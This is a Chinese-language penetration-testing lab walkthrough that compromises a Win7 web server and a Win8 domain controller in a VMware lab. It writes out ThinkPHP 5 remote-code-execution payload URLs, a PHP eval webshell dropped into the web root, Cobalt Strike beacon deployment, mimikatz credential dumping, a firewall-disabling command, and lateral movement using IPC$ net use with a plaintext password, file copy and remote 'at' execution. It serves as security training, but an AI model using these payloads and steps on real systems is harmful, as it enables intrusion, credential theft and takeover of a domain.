环境搭建
自行下载安装包 解压
VMware中
data:image/s3,"s3://crabby-images/2136f/2136fbecb1ad6734f1e55fa295386b8206b7e0e5" alt=""
data:image/s3,"s3://crabby-images/48b34/48b345ea01968b0dadfcbd850092805e02ae017e" alt=""
win7 win8 同样方法
所要用到的攻击机为kali
调节kali的网络适配器为vmnet8
data:image/s3,"s3://crabby-images/a6195/a61954ae61a7908c858737d3c260bafe98fd1209" alt=""
调节win7的网络适配器 增加vmnet5用来连接内网
data:image/s3,"s3://crabby-images/78343/7834334ab34c60d1afbfa4ac38848948319590e3" alt=""
win8 vmnet5
data:image/s3,"s3://crabby-images/a00e6/a00e632ad7ec86ca1ab918a00b38862922f19701" alt=""
名称 | ip | 角色 |
kali | 192.168.115.129 | 攻击机 |
win7 | 192.168.115.150 192.168.138.136 | |
win8 | 192.168.138.138 | DC |
拓扑图
data:image/s3,"s3://crabby-images/894ab/894abbf9bb4dccaa4ee21866fea714c92e4b57e1" alt=""
利用kali来信息收集
data:image/s3,"s3://crabby-images/efad9/efad956c376a832d99fac40e05205e0df7c4fd25" alt=""
探测到win7主机ip 115.150
进入win7 查看其ip 外网地址为192.168.115.150 内网地址为192.168.138.136
data:image/s3,"s3://crabby-images/691e0/691e06169cfe71459b55a6cd5cd6c3ef4d6d5bf1" alt=""
手动关闭win7防火墙 以便后续操作 (后面也可利用cs关闭)
data:image/s3,"s3://crabby-images/7554f/7554fa0cbcfa7a68c06e83def5fa9d59bf3d5c4a" alt=""
到c盘中开启phpstudy
data:image/s3,"s3://crabby-images/35307/35307154658f3961e85ea9de74d79f132914103d" alt=""
利用kali进行扫描
data:image/s3,"s3://crabby-images/72346/72346135c655453fd7d9fbec11f3a3c1caa305be" alt=""
发现端口80开放 尝试访问
data:image/s3,"s3://crabby-images/02c5e/02c5e2db5ca096f45ca2840f4a7c180dddf84b79" alt=""
一个网站 上面ThinkPHPV5的框架 想到thinkphp漏洞
这里我们先不上工具
测试thinkphp版本
data:image/s3,"s3://crabby-images/3f0d4/3f0d4dba7c5ba58df134f4142b69f0197f54168d" alt=""
找到版本漏洞的poc 可以命令执行
http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
data:image/s3,"s3://crabby-images/bee1c/bee1cfffbe85fd1059e13eeac6e4f61ef7db39d5" alt=""
http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
data:image/s3,"s3://crabby-images/7312c/7312c33e570e77b1ab3291c853a482a7b5f15fe4" alt=""
查看当前路径
http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd
data:image/s3,"s3://crabby-images/817a0/817a0ddd4f5856f8b36d6604d288fa4f8e23010f" alt=""
写一句木马getshell
http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST['666']); ?^> > C:\phpStudy\PHPTutorial\WWW\public\shell.php
data:image/s3,"s3://crabby-images/9ff9a/9ff9a40de4fac37f7ca3c5174486ac639b104891" alt=""
使用蚁剑连接
data:image/s3,"s3://crabby-images/895fb/895fba3c2a3f1ca0cd8f4364d1ed2ded4bbfba4a" alt=""
连接成功
data:image/s3,"s3://crabby-images/338b4/338b41856df81abdea5153511b89e241494444f7" alt=""
查看当前域环境
data:image/s3,"s3://crabby-images/b5c52/b5c527cf8088a3480a0934f4e9092acd63c34d9c" alt=""
域名sun.conn
data:image/s3,"s3://crabby-images/02c0a/02c0a6fb6b6e2b2d24c2f914d2f5d4a5058ac889" alt=""
然后ping一下sun.conn 拿到域控ip
接下来进行横向移动 上线CS
kali作为服务端
data:image/s3,"s3://crabby-images/c4190/c4190f3b6284c518fed428ecd0975ae31302c6fe" alt=""
在本机打开客户端
data:image/s3,"s3://crabby-images/820cb/820cbfc945e042cea13411b40b7283ebe598c308" alt=""
ip为kali ip 密码123456
data:image/s3,"s3://crabby-images/f3d7f/f3d7fcf9f61509c0f0624bedb49e599fb915f199" alt=""
连接成功
data:image/s3,"s3://crabby-images/3646b/3646b1ab061ea19e148ab10380e837080e7f2070" alt=""
先创建监听器
data:image/s3,"s3://crabby-images/28a2c/28a2cfc21a330293687efd506925af68c565f938" alt=""
data:image/s3,"s3://crabby-images/dc8f2/dc8f27b516e3414461d9f423b3cf76d3fe4db37a" alt=""
生成windows exe木马
data:image/s3,"s3://crabby-images/d8561/d8561f76e5ca52e10765e471f0b24e48baa1c9e3" alt=""
data:image/s3,"s3://crabby-images/f7025/f7025ebf17a6809677a37acb3e8a7b0301901a25" alt=""
选择artifact.exe
data:image/s3,"s3://crabby-images/c0750/c07501eb826e1d117f018d3aeeb770394996136a" alt=""
生成木马链接
data:image/s3,"s3://crabby-images/a4172/a41725d64cdb5b661c27f4981eb87f7f80efbb06" alt=""
选择刚刚的artifact.exe 及命名要生成文件的名字
data:image/s3,"s3://crabby-images/93f65/93f659007ea34e82cb6c038b0476d957ea741432" alt=""
创建成功
data:image/s3,"s3://crabby-images/9a32f/9a32f08ce033b031f3150967f69b1e9d8f99aa85" alt=""
使用本机下载 利用蚁剑上场到win7的桌面上
data:image/s3,"s3://crabby-images/28754/28754316bab89a9660d4e4684e94091821c34280" alt=""
再利用蚁剑对其进行运行 CS就会捕捉到win7
data:image/s3,"s3://crabby-images/56083/56083bfb5fd32ceef51cb284e9ba78dfbf988d2a" alt=""
运行mimikatz 读到了域管理员的密码
data:image/s3,"s3://crabby-images/2207f/2207fa8a5195e7462fecec07d6c5f7dfc843978d" alt=""
提权
data:image/s3,"s3://crabby-images/d29f4/d29f4e9c6fda0b5cdb104cea618a229bc8aa529f" alt=""
data:image/s3,"s3://crabby-images/e3fa0/e3fa02821272e5284bff53fc759f0ad9854f11bc" alt=""
系统权限管理员上线
data:image/s3,"s3://crabby-images/b5853/b585340af3c55415a47c0b0fd89abd26eac038d1" alt=""
我们也可以利用CS关闭防火墙 (shell netsh firewall set opmode disable)
data:image/s3,"s3://crabby-images/d3dfa/d3dfad52e9fcfdf634252bc190ddc2c579530df0" alt=""
利用系统权限的win7来让dc win8上线
在win7上设置中转监听
data:image/s3,"s3://crabby-images/bbdfc/bbdfcc35ff02c5ccef5629f32ba2482a2a3f0681" alt=""
命名为dc
data:image/s3,"s3://crabby-images/52fce/52fce86c9731cca0374263a5f5df0c72ff840585" alt=""
中转监听
data:image/s3,"s3://crabby-images/a3d03/a3d0391704c466ec95b60f5f11b24f867c1372bb" alt=""
data:image/s3,"s3://crabby-images/a3ab2/a3ab28b23aa17e8be92c759737a4c7eb178e4702" alt=""
开启端口
data:image/s3,"s3://crabby-images/2bafa/2bafac1ee20217a062f33ce85043a1fcecdc44ed" alt=""
再次生成木马
data:image/s3,"s3://crabby-images/48e0b/48e0b9807d6218187dd05466557650ab06e0a2e6" alt=""
利用蚁剑上传木马和psexec (psexec:微软官方实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。)
data:image/s3,"s3://crabby-images/fddb0/fddb0d388a21981cef36f81e819602bc73eed919" alt=""
使用命令执行木马 (shell net use\\192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator)
data:image/s3,"s3://crabby-images/d0459/d0459bced262aa2be9433bd4e8519577743e5032" alt=""
(shell copy c:\win2008cs.exe \192.168.138.138\c$)
执行木马 (shell at \192.168.138.138 c:\2008cs.exe)
也可利用蚁剑执行
dc上线
data:image/s3,"s3://crabby-images/08842/08842aa59eac809bc4230a2bda8850a681b11898" alt=""
data:image/s3,"s3://crabby-images/4ea20/4ea206cbf6bbc05028effd2358fc863bd6c89f6f" alt=""